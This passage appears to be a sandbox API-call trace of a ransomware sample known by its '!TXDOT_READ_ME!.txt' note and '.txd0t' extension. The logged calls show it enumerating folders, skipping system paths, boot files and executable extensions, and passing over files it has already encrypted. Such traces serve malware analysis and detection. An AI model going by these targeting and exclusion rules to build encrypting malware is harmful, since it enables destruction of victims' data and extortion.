[0128.827] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0128.827] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0128.827] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0128.827] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0128.827] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0128.827] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0128.827] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0128.827] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0128.827] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0128.827] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0128.827] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.827] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.828] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.828] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0128.828] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0128.828] GetProcessHeap () returned 0xe30000 [0128.828] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0128.828] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58d06c80, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58d06c80, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="2052", cAlternateFileName="")) returned 1 [0128.828] StrCmpW (psz1="2052", psz2=".") returned 1 [0128.828] StrCmpW (psz1="2052", psz2="..") returned 1 [0128.828] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.828] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.828] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="2052", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\2052") returned="C:\\588bce7c90097ed212\\2052" [0128.828] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\windows\\system32\\") returned 0x0 [0128.828] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.828] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\windows\\system\\") returned 0x0 [0128.828] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.828] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.828] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\appdata\\local\\") returned 0x0 [0128.828] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.828] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.828] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.828] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch=":\\boot\\") returned 0x0 [0128.828] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch=":\\perflogs\\") returned 0x0 [0128.828] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch=":\\programdata\\") returned 0x0 [0128.828] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch=":\\drivers\\") returned 0x0 [0128.828] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch=":\\wsus\\") returned 0x0 [0128.828] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.828] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.828] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="crypt_detect") returned 0x0 [0128.828] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="cryptolocker") returned 0x0 [0128.828] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="ransomware") returned 0x0 [0128.828] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="C:\\WINDOWS") returned 0x0 [0128.828] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.829] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2052", lpSrch="C:\\Program Files") returned 0x0 [0128.829] GetProcessHeap () returned 0xe30000 [0128.829] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x6874278 [0128.829] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\2052", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052") returned="C:\\588bce7c90097ed212\\2052" [0128.829] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2052", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052\\*") returned="C:\\588bce7c90097ed212\\2052\\*" [0128.829] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\2052\\*", lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58d06c80, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58d06c80, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0128.829] StrCmpW (psz1=".", psz2=".") returned 0 [0128.829] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58d06c80, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58d06c80, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.829] StrCmpW (psz1="..", psz2=".") returned 1 [0128.829] StrCmpW (psz1="..", psz2="..") returned 0 [0128.829] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58c21df5, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x58c21df5, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58ce09c7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0128.829] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0128.829] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0128.829] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\2052", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052") returned="C:\\588bce7c90097ed212\\2052" [0128.829] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2052", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052\\") returned="C:\\588bce7c90097ed212\\2052\\" [0128.829] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2052\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\2052\\!TXDOT_READ_ME!.txt" [0128.829] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0128.829] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0128.829] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0128.829] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0128.829] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0128.829] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0128.829] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0128.829] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0128.829] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0128.829] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0128.829] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0128.829] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0128.829] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0128.829] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0128.829] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0128.830] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0128.830] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x58c21df5, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x18c3, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0128.830] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0128.830] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0128.830] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\2052", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052") returned="C:\\588bce7c90097ed212\\2052" [0128.830] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2052", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052\\") returned="C:\\588bce7c90097ed212\\2052\\" [0128.830] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2052\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\2052\\eula.rtf.txd0t" [0128.830] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0128.830] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.830] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x58c21df5, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xef0c, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0128.830] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0128.830] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0128.830] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\2052", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052") returned="C:\\588bce7c90097ed212\\2052" [0128.830] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2052", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052\\") returned="C:\\588bce7c90097ed212\\2052\\" [0128.830] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2052\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml.txd0t" [0128.830] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0128.830] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.830] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0128.830] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0128.830] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0128.830] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\2052", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052") returned="C:\\588bce7c90097ed212\\2052" [0128.830] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2052", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052\\") returned="C:\\588bce7c90097ed212\\2052\\" [0128.830] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2052\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\2052\\SetupResources.dll" [0128.830] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.830] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0128.830] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0128.830] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0128.830] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0128.830] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0128.830] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0128.830] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0128.830] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0128.830] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0128.830] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0128.831] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0128.831] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0128.831] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0128.831] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0128.831] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.831] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.831] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.831] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0128.831] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0128.831] GetProcessHeap () returned 0xe30000 [0128.831] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0128.831] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58ce09c7, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58ce09c7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="2070", cAlternateFileName="")) returned 1 [0128.831] StrCmpW (psz1="2070", psz2=".") returned 1 [0128.831] StrCmpW (psz1="2070", psz2="..") returned 1 [0128.831] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.831] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.831] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="2070", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\2070") returned="C:\\588bce7c90097ed212\\2070" [0128.831] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\windows\\system32\\") returned 0x0 [0128.831] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.831] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\windows\\system\\") returned 0x0 [0128.831] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.831] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.831] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\appdata\\local\\") returned 0x0 [0128.831] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.831] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.831] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.831] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch=":\\boot\\") returned 0x0 [0128.831] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch=":\\perflogs\\") returned 0x0 [0128.831] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch=":\\programdata\\") returned 0x0 [0128.831] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch=":\\drivers\\") returned 0x0 [0128.831] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch=":\\wsus\\") returned 0x0 [0128.831] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.832] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.832] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="crypt_detect") returned 0x0 [0128.832] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="cryptolocker") returned 0x0 [0128.832] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="ransomware") returned 0x0 [0128.832] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="C:\\WINDOWS") returned 0x0 [0128.832] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.832] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="C:\\Program Files") returned 0x0 [0128.832] GetProcessHeap () returned 0xe30000 [0128.832] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x6874278 [0128.832] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\2070", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070") returned="C:\\588bce7c90097ed212\\2070" [0128.832] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2070", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070\\*") returned="C:\\588bce7c90097ed212\\2070\\*" [0128.832] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\2070\\*", lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58ce09c7, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58ce09c7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0128.832] StrCmpW (psz1=".", psz2=".") returned 0 [0128.832] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58ce09c7, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58ce09c7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.832] StrCmpW (psz1="..", psz2=".") returned 1 [0128.832] StrCmpW (psz1="..", psz2="..") returned 0 [0128.832] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58c21df5, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x58c21df5, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58c21df5, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0128.832] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0128.832] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0128.832] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\2070", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070") returned="C:\\588bce7c90097ed212\\2070" [0128.832] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2070", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070\\") returned="C:\\588bce7c90097ed212\\2070\\" [0128.832] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2070\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\2070\\!TXDOT_READ_ME!.txt" [0128.832] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0128.832] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0128.832] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0128.832] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0128.832] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0128.832] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0128.832] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0128.832] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0128.832] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0128.833] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0128.833] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0128.833] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0128.833] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0128.833] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0128.833] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0128.833] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0128.833] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x58bfbbda, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11af, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0128.833] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0128.833] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0128.833] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\2070", 